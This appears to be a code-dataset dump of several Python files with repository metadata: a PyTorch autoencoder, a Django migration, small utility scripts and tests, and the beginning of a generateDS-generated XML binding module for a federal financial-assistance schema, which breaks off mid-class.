| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
bc0fa790fcb8ab1bd6577826c4e3b0e56c01341f
| 1,646
|
py
|
Python
|
DIGDriver/region_model/autoencoders/ae_nets/fc_nets.py
|
maxwellsh/DIGDriver
|
1f8503c8c22861d6f9b601fd8c5a131e3dc31fc1
|
[
"BSD-3-Clause"
] | 1
|
2021-08-07T00:05:48.000Z
|
2021-08-07T00:05:48.000Z
|
DIGDriver/region_model/autoencoders/ae_nets/fc_nets.py
|
maxwellsh/DIGDriver
|
1f8503c8c22861d6f9b601fd8c5a131e3dc31fc1
|
[
"BSD-3-Clause"
] | null | null | null |
DIGDriver/region_model/autoencoders/ae_nets/fc_nets.py
|
maxwellsh/DIGDriver
|
1f8503c8c22861d6f9b601fd8c5a131e3dc31fc1
|
[
"BSD-3-Clause"
] | null | null | null |
import torch
import torch.nn as nn
class Autoencoder_FC(nn.Module):
def __init__(self, in_shape):
super().__init__()
bs,w,tracks = in_shape
self.encoder = nn.Sequential(
nn.Linear(w * tracks, 512),
nn.ReLU(),
nn.Linear(512, 128),
nn.ReLU(),
nn.Linear(128, 32),
nn.ReLU(),
nn.Linear(32, 16),
)
self.decoder = nn.Sequential(
nn.Linear(16, 32),
nn.ReLU(),
nn.Linear(32, 128),
nn.ReLU(),
nn.Linear(128, 512),
nn.ReLU(),
nn.Linear(512, w * tracks),
)
def forward(self, x):
x = self.encoder(x)
x = self.decoder(x)
return x
def embeding(self, x):
x = self.encoder(x)
return x
class Mean_Vec_Autoencoder_FC(nn.Module):
def __init__(self, in_shape):
super().__init__()
bs,w,tracks = in_shape
self.encoder = nn.Sequential(
nn.Linear(tracks, 512),
nn.ReLU(),
nn.Linear(512, 128),
nn.ReLU(),
nn.Linear(128, 32),
nn.ReLU(),
nn.Linear(32, 16),
)
self.decoder = nn.Sequential(
nn.Linear(16, 32),
nn.ReLU(),
nn.Linear(32, 128),
nn.ReLU(),
nn.Linear(128, 512),
nn.ReLU(),
nn.Linear(512, tracks),
)
def forward(self, x):
x = self.encoder(x)
x = self.decoder(x)
return x
def embeding(self, x):
x = self.encoder(x)
return x
| 24.567164
| 41
| 0.458688
| 197
| 1,646
| 3.71066
| 0.162437
| 0.175103
| 0.131327
| 0.229822
| 0.935705
| 0.935705
| 0.935705
| 0.935705
| 0.935705
| 0.935705
| 0
| 0.07362
| 0.405832
| 1,646
| 66
| 42
| 24.939394
| 0.673824
| 0
| 0
| 0.8
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.1
| false
| 0
| 0.033333
| 0
| 0.233333
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
cb094fe8464af6f4ce8982e36f75fb024bd2d84b
| 2,490
|
py
|
Python
|
business_register/migrations/0075_auto_20210324_1008.py
|
OlexandrTopuzov/Data_converter
|
0ac2319ccaae790af35ab2202724c65d83d32ecc
|
[
"MIT"
] | null | null | null |
business_register/migrations/0075_auto_20210324_1008.py
|
OlexandrTopuzov/Data_converter
|
0ac2319ccaae790af35ab2202724c65d83d32ecc
|
[
"MIT"
] | null | null | null |
business_register/migrations/0075_auto_20210324_1008.py
|
OlexandrTopuzov/Data_converter
|
0ac2319ccaae790af35ab2202724c65d83d32ecc
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.0.7 on 2021-03-24 10:08
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('business_register', '0074_auto_20210323_1515'),
]
operations = [
migrations.AlterField(
model_name='companylinkwithpep',
name='confirmation_date',
field=models.DateField(help_text='Date of confirmation of connection in the "Anti-Corruption Action Center" database.', null=True, verbose_name='connection`s confirmation date'),
),
migrations.AlterField(
model_name='companylinkwithpep',
name='end_date',
field=models.DateField(help_text='Date of termination of connection between the person and this company', null=True, verbose_name='connection`s end date'),
),
migrations.AlterField(
model_name='companylinkwithpep',
name='start_date',
field=models.DateField(help_text="Date of the beginning of the person's connection with the company.", null=True, verbose_name='connection`s start date'),
),
migrations.AlterField(
model_name='historicalpep',
name='termination_date',
field=models.DateField(help_text='PEP status termination date in YYYY-MM-DD format.', null=True, verbose_name='PEP status termination date '),
),
migrations.AlterField(
model_name='pep',
name='termination_date',
field=models.DateField(help_text='PEP status termination date in YYYY-MM-DD format.', null=True, verbose_name='PEP status termination date '),
),
migrations.AlterField(
model_name='relatedpersonslink',
name='confirmation_date',
field=models.DateField(help_text='Date of confirmation of connection in the "Anti-Corruption Action Center" database.', null=True, verbose_name='connection`s confirmation date'),
),
migrations.AlterField(
model_name='relatedpersonslink',
name='end_date',
field=models.DateField(help_text='The date the relationship ends.', null=True, verbose_name='connection`s end date'),
),
migrations.AlterField(
model_name='relatedpersonslink',
name='start_date',
field=models.DateField(help_text='Date of the beginning of the relationship.', null=True, verbose_name='connection`s start date'),
),
]
| 46.111111
| 190
| 0.651807
| 275
| 2,490
| 5.770909
| 0.254545
| 0.100819
| 0.126024
| 0.146188
| 0.821676
| 0.803403
| 0.773787
| 0.708255
| 0.606175
| 0.606175
| 0
| 0.016481
| 0.244578
| 2,490
| 53
| 191
| 46.981132
| 0.82722
| 0.018072
| 0
| 0.723404
| 1
| 0
| 0.386001
| 0.009415
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.021277
| 0
| 0.085106
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb1f3a458254fb01557ef2a46a6e3a0819eb2536
| 77
|
py
|
Python
|
run.py
|
kimani-njoroge/Password_Locker
|
9752ad84bae46d517576d78ca1a5816d1ad72202
|
[
"MIT"
] | null | null | null |
run.py
|
kimani-njoroge/Password_Locker
|
9752ad84bae46d517576d78ca1a5816d1ad72202
|
[
"MIT"
] | null | null | null |
run.py
|
kimani-njoroge/Password_Locker
|
9752ad84bae46d517576d78ca1a5816d1ad72202
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3.6
from lock import User
from lock import Credentials
| 15.4
| 28
| 0.779221
| 13
| 77
| 4.615385
| 0.769231
| 0.266667
| 0.466667
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.030303
| 0.142857
| 77
| 4
| 29
| 19.25
| 0.878788
| 0.298701
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
cb2af825639e61a0c87e2adb12e101fccfdc318d
| 61
|
py
|
Python
|
examples/modules/text_modeling.py
|
snehankekre/streamlit-yellowbrick
|
fd94bf4554966390ee578831612350d613aa3de7
|
[
"MIT"
] | 7
|
2021-06-08T10:24:19.000Z
|
2022-02-02T11:57:56.000Z
|
examples/modules/text_modeling.py
|
snehankekre/streamlit-yellowbrick
|
fd94bf4554966390ee578831612350d613aa3de7
|
[
"MIT"
] | null | null | null |
examples/modules/text_modeling.py
|
snehankekre/streamlit-yellowbrick
|
fd94bf4554966390ee578831612350d613aa3de7
|
[
"MIT"
] | null | null | null |
import streamlit as st
def run_text_modeling():
return
| 10.166667
| 24
| 0.737705
| 9
| 61
| 4.777778
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.213115
| 61
| 5
| 25
| 12.2
| 0.895833
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| true
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
cb30b7fa0113b5a568746307cf11476c5ac54f19
| 195
|
py
|
Python
|
tests/test_logging_handler.py
|
bbux-dev/dataspec
|
6a0efd1c91ff222831a3fb15e7b458515ffc47d0
|
[
"MIT"
] | 2
|
2021-04-21T13:53:16.000Z
|
2021-08-24T16:51:16.000Z
|
tests/test_logging_handler.py
|
bbux-dev/dataspec
|
6a0efd1c91ff222831a3fb15e7b458515ffc47d0
|
[
"MIT"
] | 5
|
2021-03-14T16:31:41.000Z
|
2021-07-02T09:00:31.000Z
|
tests/test_logging_handler.py
|
bbux-dev/dataspec
|
6a0efd1c91ff222831a3fb15e7b458515ffc47d0
|
[
"MIT"
] | null | null | null |
from datagen import logging_handler
def test_logging_handler():
""" for coverage sake """
logging_handler.configure_logging('debug')
logging_handler.configure_logging('off')
| 24.375
| 47
| 0.728205
| 22
| 195
| 6.136364
| 0.590909
| 0.414815
| 0.340741
| 0.444444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.174359
| 195
| 7
| 48
| 27.857143
| 0.838509
| 0.087179
| 0
| 0
| 0
| 0
| 0.04908
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| true
| 0
| 0.25
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
cb46d63c4b0b8d3577e3cc0ee39f43a7bd78616b
| 614,443
|
py
|
Python
|
mappings/finassist.py
|
18F/data-act-pilot
|
ccfb6631ea757dd6980f4770e71aeaf1f6fa5a22
|
[
"CC0-1.0"
] | 24
|
2015-06-16T17:29:30.000Z
|
2022-02-15T14:31:34.000Z
|
mappings/finassist.py
|
18F/data-act-pilot
|
ccfb6631ea757dd6980f4770e71aeaf1f6fa5a22
|
[
"CC0-1.0"
] | 112
|
2015-06-16T18:30:32.000Z
|
2016-02-18T21:53:47.000Z
|
mappings/finassist.py
|
18F/data-act-pilot
|
ccfb6631ea757dd6980f4770e71aeaf1f6fa5a22
|
[
"CC0-1.0"
] | 11
|
2015-06-17T03:23:25.000Z
|
2021-02-17T11:07:19.000Z
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Generated by generateDS.py.
#
# Command line options:
# ('-o', 'finassist.py')
# ('-q', '')
# ('-f', '')
# ('--no-dates', '')
# ('--no-versions', '')
#
# Command line arguments:
# ../schema/xbrl/finassist/da-finassist-content-2015-06-29.xsd
#
# Command line:
# /Users/rebeccasweger/Dev/.virtualenvs/intercessor/lib/python2.7/site-packages/generateDS-2.17a0/generateDS.py -o "finassist.py" -q -f --no-dates --no-versions ../schema/xbrl/finassist/da-finassist-content-2015-06-29.xsd
#
# Current working directory (os.getcwd()):
# mappings
#
import sys
import re as re_
import base64
import datetime as datetime_
import warnings as warnings_
from lxml import etree as etree_
Validate_simpletypes_ = True
def parsexml_(infile, parser=None, **kwargs):
if parser is None:
# Use the lxml ElementTree compatible parser so that, e.g.,
# we ignore comments.
parser = etree_.ETCompatXMLParser()
doc = etree_.parse(infile, parser=parser, **kwargs)
return doc
#
# User methods
#
# Calls to the methods in these classes are generated by generateDS.py.
# You can replace these methods by re-implementing the following class
# in a module named generatedssuper.py.
try:
from generatedssuper import GeneratedsSuper
except ImportError as exp:
class GeneratedsSuper(object):
tzoff_pattern = re_.compile(r'(\+|-)((0\d|1[0-3]):[0-5]\d|14:00)$')
class _FixedOffsetTZ(datetime_.tzinfo):
def __init__(self, offset, name):
self.__offset = datetime_.timedelta(minutes=offset)
self.__name = name
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self, dt):
return None
def gds_format_string(self, input_data, input_name=''):
return input_data
def gds_validate_string(self, input_data, node=None, input_name=''):
if not input_data:
return ''
else:
return input_data
def gds_format_base64(self, input_data, input_name=''):
return base64.b64encode(input_data)
def gds_validate_base64(self, input_data, node=None, input_name=''):
return input_data
def gds_format_integer(self, input_data, input_name=''):
return '%d' % input_data
def gds_validate_integer(self, input_data, node=None, input_name=''):
return input_data
def gds_format_integer_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_integer_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
int(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of integers')
return values
def gds_format_float(self, input_data, input_name=''):
return ('%.15f' % input_data).rstrip('0')
def gds_validate_float(self, input_data, node=None, input_name=''):
return input_data
def gds_format_float_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_float_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of floats')
return values
def gds_format_double(self, input_data, input_name=''):
return '%e' % input_data
def gds_validate_double(self, input_data, node=None, input_name=''):
return input_data
def gds_format_double_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_double_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
try:
float(value)
except (TypeError, ValueError):
raise_parse_error(node, 'Requires sequence of doubles')
return values
def gds_format_boolean(self, input_data, input_name=''):
return ('%s' % input_data).lower()
def gds_validate_boolean(self, input_data, node=None, input_name=''):
return input_data
def gds_format_boolean_list(self, input_data, input_name=''):
return '%s' % ' '.join(input_data)
def gds_validate_boolean_list(
self, input_data, node=None, input_name=''):
values = input_data.split()
for value in values:
if value not in ('true', '1', 'false', '0', ):
raise_parse_error(
node,
'Requires sequence of booleans '
'("true", "1", "false", "0")')
return values
def gds_validate_datetime(self, input_data, node=None, input_name=''):
return input_data
def gds_format_datetime(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%04d-%02d-%02dT%02d:%02d:%02d.%s' % (
input_data.year,
input_data.month,
input_data.day,
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
@classmethod
def gds_parse_datetime(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
time_parts = input_data.split('.')
if len(time_parts) > 1:
micro_seconds = int(float('0.' + time_parts[1]) * 1000000)
input_data = '%s.%s' % (time_parts[0], micro_seconds, )
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S.%f')
else:
dt = datetime_.datetime.strptime(
input_data, '%Y-%m-%dT%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt
def gds_validate_date(self, input_data, node=None, input_name=''):
return input_data
def gds_format_date(self, input_data, input_name=''):
_svalue = '%04d-%02d-%02d' % (
input_data.year,
input_data.month,
input_data.day,
)
try:
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
except AttributeError:
pass
return _svalue
@classmethod
def gds_parse_date(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
dt = datetime_.datetime.strptime(input_data, '%Y-%m-%d')
dt = dt.replace(tzinfo=tz)
return dt.date()
def gds_validate_time(self, input_data, node=None, input_name=''):
return input_data
def gds_format_time(self, input_data, input_name=''):
if input_data.microsecond == 0:
_svalue = '%02d:%02d:%02d' % (
input_data.hour,
input_data.minute,
input_data.second,
)
else:
_svalue = '%02d:%02d:%02d.%s' % (
input_data.hour,
input_data.minute,
input_data.second,
('%f' % (float(input_data.microsecond) / 1000000))[2:],
)
if input_data.tzinfo is not None:
tzoff = input_data.tzinfo.utcoffset(input_data)
if tzoff is not None:
total_seconds = tzoff.seconds + (86400 * tzoff.days)
if total_seconds == 0:
_svalue += 'Z'
else:
if total_seconds < 0:
_svalue += '-'
total_seconds *= -1
else:
_svalue += '+'
hours = total_seconds // 3600
minutes = (total_seconds - (hours * 3600)) // 60
_svalue += '{0:02d}:{1:02d}'.format(hours, minutes)
return _svalue
def gds_validate_simple_patterns(self, patterns, target):
# pat is a list of lists of strings/patterns. We should:
# - AND the outer elements
# - OR the inner elements
found1 = True
for patterns1 in patterns:
found2 = False
for patterns2 in patterns1:
if re_.search(patterns2, target) is not None:
found2 = True
break
if not found2:
found1 = False
break
return found1
@classmethod
def gds_parse_time(cls, input_data):
tz = None
if input_data[-1] == 'Z':
tz = GeneratedsSuper._FixedOffsetTZ(0, 'UTC')
input_data = input_data[:-1]
else:
results = GeneratedsSuper.tzoff_pattern.search(input_data)
if results is not None:
tzoff_parts = results.group(2).split(':')
tzoff = int(tzoff_parts[0]) * 60 + int(tzoff_parts[1])
if results.group(1) == '-':
tzoff *= -1
tz = GeneratedsSuper._FixedOffsetTZ(
tzoff, results.group(0))
input_data = input_data[:-6]
if len(input_data.split('.')) > 1:
dt = datetime_.datetime.strptime(input_data, '%H:%M:%S.%f')
else:
dt = datetime_.datetime.strptime(input_data, '%H:%M:%S')
dt = dt.replace(tzinfo=tz)
return dt.time()
def gds_str_lower(self, instring):
return instring.lower()
def get_path_(self, node):
path_list = []
self.get_path_list_(node, path_list)
path_list.reverse()
path = '/'.join(path_list)
return path
Tag_strip_pattern_ = re_.compile(r'\{.*\}')
def get_path_list_(self, node, path_list):
if node is None:
return
tag = GeneratedsSuper.Tag_strip_pattern_.sub('', node.tag)
if tag:
path_list.append(tag)
self.get_path_list_(node.getparent(), path_list)
def get_class_obj_(self, node, default_class=None):
class_obj1 = default_class
if 'xsi' in node.nsmap:
classname = node.get('{%s}type' % node.nsmap['xsi'])
if classname is not None:
names = classname.split(':')
if len(names) == 2:
classname = names[1]
class_obj2 = globals().get(classname)
if class_obj2 is not None:
class_obj1 = class_obj2
return class_obj1
def gds_build_any(self, node, type_name=None):
return None
@classmethod
def gds_reverse_node_mapping(cls, mapping):
return dict(((v, k) for k, v in mapping.iteritems()))
#
# If you have installed IPython you can uncomment and use the following.
# IPython is available from http://ipython.scipy.org/.
#
## from IPython.Shell import IPShellEmbed
## args = ''
## ipshell = IPShellEmbed(args,
## banner = 'Dropping into IPython',
## exit_msg = 'Leaving Interpreter, back to program.')
# Then use the following line where and when you want to drop into the
# IPython shell:
# ipshell('<some message> -- Entering ipshell.\nHit Ctrl-D to exit')
#
# Globals
#
ExternalEncoding = 'ascii'
Tag_pattern_ = re_.compile(r'({.*})?(.*)')
String_cleanup_pat_ = re_.compile(r"[\n\r\s]+")
Namespace_extract_pat_ = re_.compile(r'{(.*)}(.*)')
CDATA_pattern_ = re_.compile(r"<!\[CDATA\[.*?\]\]>", re_.DOTALL)
#
# Support/utility functions.
#
def showIndent(outfile, level, pretty_print=True):
if pretty_print:
for idx in range(level):
outfile.write(' ')
def quote_xml(inStr):
"Escape markup chars, but do not modify CDATA sections."
if not inStr:
return ''
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
s2 = ''
pos = 0
matchobjects = CDATA_pattern_.finditer(s1)
for mo in matchobjects:
s3 = s1[pos:mo.start()]
s2 += quote_xml_aux(s3)
s2 += s1[mo.start():mo.end()]
pos = mo.end()
s3 = s1[pos:]
s2 += quote_xml_aux(s3)
return s2
def quote_xml_aux(inStr):
s1 = inStr.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
return s1
def quote_attrib(inStr):
s1 = (isinstance(inStr, basestring) and inStr or
'%s' % inStr)
s1 = s1.replace('&', '&')
s1 = s1.replace('<', '<')
s1 = s1.replace('>', '>')
if '"' in s1:
if "'" in s1:
s1 = '"%s"' % s1.replace('"', """)
else:
s1 = "'%s'" % s1
else:
s1 = '"%s"' % s1
return s1
def quote_python(inStr):
s1 = inStr
if s1.find("'") == -1:
if s1.find('\n') == -1:
return "'%s'" % s1
else:
return "'''%s'''" % s1
else:
if s1.find('"') != -1:
s1 = s1.replace('"', '\\"')
if s1.find('\n') == -1:
return '"%s"' % s1
else:
return '"""%s"""' % s1
def get_all_text_(node):
if node.text is not None:
text = node.text
else:
text = ''
for child in node:
if child.tail is not None:
text += child.tail
return text
def find_attr_value_(attr_name, node):
attrs = node.attrib
attr_parts = attr_name.split(':')
value = None
if len(attr_parts) == 1:
value = attrs.get(attr_name)
elif len(attr_parts) == 2:
prefix, name = attr_parts
namespace = node.nsmap.get(prefix)
if namespace is not None:
value = attrs.get('{%s}%s' % (namespace, name, ))
return value
class GDSParseError(Exception):
pass
def raise_parse_error(node, msg):
msg = '%s (element %s/line %d)' % (msg, node.tag, node.sourceline, )
raise GDSParseError(msg)
class MixedContainer:
# Constants for category:
CategoryNone = 0
CategoryText = 1
CategorySimple = 2
CategoryComplex = 3
# Constants for content_type:
TypeNone = 0
TypeText = 1
TypeString = 2
TypeInteger = 3
TypeFloat = 4
TypeDecimal = 5
TypeDouble = 6
TypeBoolean = 7
TypeBase64 = 8
def __init__(self, category, content_type, name, value):
self.category = category
self.content_type = content_type
self.name = name
self.value = value
def getCategory(self):
return self.category
def getContenttype(self, content_type):
return self.content_type
def getValue(self):
return self.value
def getName(self):
return self.name
def export(self, outfile, level, name, namespace, pretty_print=True):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
outfile.write(self.value)
elif self.category == MixedContainer.CategorySimple:
self.exportSimple(outfile, level, name)
else: # category == MixedContainer.CategoryComplex
self.value.export(outfile, level, namespace, name, pretty_print)
def exportSimple(self, outfile, level, name):
if self.content_type == MixedContainer.TypeString:
outfile.write('<%s>%s</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeInteger or \
self.content_type == MixedContainer.TypeBoolean:
outfile.write('<%s>%d</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeFloat or \
self.content_type == MixedContainer.TypeDecimal:
outfile.write('<%s>%f</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeDouble:
outfile.write('<%s>%g</%s>' % (
self.name, self.value, self.name))
elif self.content_type == MixedContainer.TypeBase64:
outfile.write('<%s>%s</%s>' % (
self.name, base64.b64encode(self.value), self.name))
def to_etree(self, element):
if self.category == MixedContainer.CategoryText:
# Prevent exporting empty content as empty lines.
if self.value.strip():
if len(element) > 0:
if element[-1].tail is None:
element[-1].tail = self.value
else:
element[-1].tail += self.value
else:
if element.text is None:
element.text = self.value
else:
element.text += self.value
elif self.category == MixedContainer.CategorySimple:
subelement = etree_.SubElement(element, '%s' % self.name)
subelement.text = self.to_etree_simple()
else: # category == MixedContainer.CategoryComplex
self.value.to_etree(element)
def to_etree_simple(self):
if self.content_type == MixedContainer.TypeString:
text = self.value
elif (self.content_type == MixedContainer.TypeInteger or
self.content_type == MixedContainer.TypeBoolean):
text = '%d' % self.value
elif (self.content_type == MixedContainer.TypeFloat or
self.content_type == MixedContainer.TypeDecimal):
text = '%f' % self.value
elif self.content_type == MixedContainer.TypeDouble:
text = '%g' % self.value
elif self.content_type == MixedContainer.TypeBase64:
text = '%s' % base64.b64encode(self.value)
return text
def exportLiteral(self, outfile, level, name):
if self.category == MixedContainer.CategoryText:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type, self.name, self.value))
elif self.category == MixedContainer.CategorySimple:
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s", "%s"),\n' % (
self.category, self.content_type, self.name, self.value))
else: # category == MixedContainer.CategoryComplex
showIndent(outfile, level)
outfile.write(
'model_.MixedContainer(%d, %d, "%s",\n' % (
self.category, self.content_type, self.name,))
self.value.exportLiteral(outfile, level + 1)
showIndent(outfile, level)
outfile.write(')\n')
class MemberSpec_(object):
def __init__(self, name='', data_type='', container=0):
self.name = name
self.data_type = data_type
self.container = container
def set_name(self, name): self.name = name
def get_name(self): return self.name
def set_data_type(self, data_type): self.data_type = data_type
def get_data_type_chain(self): return self.data_type
def get_data_type(self):
if isinstance(self.data_type, list):
if len(self.data_type) > 0:
return self.data_type[-1]
else:
return 'xs:string'
else:
return self.data_type
def set_container(self, container): self.container = container
def get_container(self): return self.container
def _cast(typ, value):
if typ is None or value is None:
return value
return typ(value)
#
# Data representation classes.
#
class awardComplexType(GeneratedsSuper):
subclass = None
superclass = None
def __init__(self, id=None, awardDescription=None, awardID=None, parentAwardID=None, modificationAmendmentNumber=None, recordType=None, typeOfAction=None, typeOfTransactionCode=None, awardeeInformation=None, primaryPlaceOfPerformance=None, periodOfPerformance=None, awardingAgency=None, fundingAgency=None, awardingSubTierAgency=None, fundingSubTierAgency=None, highlyCompensatedOfficer=None, catalogOfFederalDomesticAssistanceProgram=None, awardAmounts=None):
self.original_tagname_ = None
self.id = _cast(None, id)
self.awardDescription = awardDescription
self.awardID = awardID
self.parentAwardID = parentAwardID
self.modificationAmendmentNumber = modificationAmendmentNumber
self.recordType = recordType
self.typeOfAction = typeOfAction
self.typeOfTransactionCode = typeOfTransactionCode
self.awardeeInformation = awardeeInformation
self.primaryPlaceOfPerformance = primaryPlaceOfPerformance
self.periodOfPerformance = periodOfPerformance
if awardingAgency is None:
self.awardingAgency = []
else:
self.awardingAgency = awardingAgency
if fundingAgency is None:
self.fundingAgency = []
else:
self.fundingAgency = fundingAgency
if awardingSubTierAgency is None:
self.awardingSubTierAgency = []
else:
self.awardingSubTierAgency = awardingSubTierAgency
if fundingSubTierAgency is None:
self.fundingSubTierAgency = []
else:
self.fundingSubTierAgency = fundingSubTierAgency
if highlyCompensatedOfficer is None:
self.highlyCompensatedOfficer = []
else:
self.highlyCompensatedOfficer = highlyCompensatedOfficer
self.catalogOfFederalDomesticAssistanceProgram = catalogOfFederalDomesticAssistanceProgram
self.awardAmounts = awardAmounts
def factory(*args_, **kwargs_):
if awardComplexType.subclass:
return awardComplexType.subclass(*args_, **kwargs_)
else:
return awardComplexType(*args_, **kwargs_)
factory = staticmethod(factory)
def get_awardDescription(self): return self.awardDescription
def set_awardDescription(self, awardDescription): self.awardDescription = awardDescription
def get_awardID(self): return self.awardID
def set_awardID(self, awardID): self.awardID = awardID
def get_parentAwardID(self): return self.parentAwardID
def set_parentAwardID(self, parentAwardID): self.parentAwardID = parentAwardID
def get_modificationAmendmentNumber(self): return self.modificationAmendmentNumber
def set_modificationAmendmentNumber(self, modificationAmendmentNumber): self.modificationAmendmentNumber = modificationAmendmentNumber
def get_recordType(self): return self.recordType
def set_recordType(self, recordType): self.recordType = recordType
def get_typeOfAction(self): return self.typeOfAction
def set_typeOfAction(self, typeOfAction): self.typeOfAction = typeOfAction
def get_typeOfTransactionCode(self): return self.typeOfTransactionCode
def set_typeOfTransactionCode(self, typeOfTransactionCode): self.typeOfTransactionCode = typeOfTransactionCode
def get_awardeeInformation(self): return self.awardeeInformation
def set_awardeeInformation(self, awardeeInformation): self.awardeeInformation = awardeeInformation
def get_primaryPlaceOfPerformance(self): return self.primaryPlaceOfPerformance
def set_primaryPlaceOfPerformance(self, primaryPlaceOfPerformance): self.primaryPlaceOfPerformance = primaryPlaceOfPerformance
def get_periodOfPerformance(self): return self.periodOfPerformance
def set_periodOfPerformance(self, periodOfPerformance): self.periodOfPerformance = periodOfPerformance
def get_awardingAgency(self): return self.awardingAgency
def set_awardingAgency(self, awardingAgency): self.awardingAgency = awardingAgency
def add_awardingAgency(self, value): self.awardingAgency.append(value)
